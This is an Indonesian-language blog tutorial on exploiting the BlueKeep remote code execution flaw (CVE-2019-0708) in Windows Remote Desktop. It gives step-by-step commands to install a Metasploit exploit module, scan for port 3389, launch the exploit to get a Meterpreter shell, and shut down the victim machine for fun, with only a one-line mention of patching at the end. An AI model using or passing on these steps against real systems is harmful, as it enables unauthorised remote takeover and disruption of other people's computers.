CVE-2019-0708 – How To Exploit Remote Code Execution Windows

Bila Sudah di download lakukan sebagai berikut :

1.membuat direktori dahulu sebelum file frameworknya di copy

mkdir /usr/share/metasploit-framework/modules/exploits/windows/rdp

2.mengcopy filenya ke direktori yang telah kita buat tadi masuk ke folder download

:~/Downloads/msf-module-CVE-2019-0708-master# cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp

:~/Downloads/msf-module-CVE-2019-0708-master# cp rdp.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp

:~/Downloads/msf-module-CVE-2019-0708-master# cp rdp.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp

:~/Downloads/msf-module-CVE-2019-0708-master# cp rdp_bluekeep.py /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp

Hasilnya sebagai berikut ya gan

kalau sudah seperti gambar diatas berarti sudah berhasil agan memasukkan framework Bluekeepnya

untuk mulai,kita pastikan dahulu IP dan port remote-desktopnya terbuka atau tidak (tcp- 3389),target kita adalah ip dibawah,agan bisa menggunakan nmap dan lain lainnya untuk scan,kalau dibawah saya menggunakan xerosploit

untuk scan portnya yuk kita coba

Nah untuk port 3389 kebuka diatas,selanjutnya yuk kita exploit windowsnya
masuk ke dalam metasploit and ketikkan

“use exploit/windows/rdp/cve_2019_0708_bluekeep_rce”

kita cek targetnya terlebih dahulu

karena saya pakai nomor 2 maka yang akan saya pilih nomor 2,pilih set target 2
kalau sudah masuk ke dalam meterpreter

kalau agan sudah masuk ke dalam meterpreter berarti sudah berhasil gan,kita lihat yuk informasi komputernya

Dengan tampilan diatas kita sudah masuk remotly access windowsnya sekarang kita coba masuk kedalam CMD windows dan kita lihat dengan mengetik ipconfig

kira-kira kalau sudah jebol gini mau ngapain ya??? kita jahilin aja ya shutdown windowsnya aza ya..

untuk menanggulanginya pada CVE-2019-0708 maka update patch baru microsoft agan

Microsoft-Patch

Semoga Bermanfaat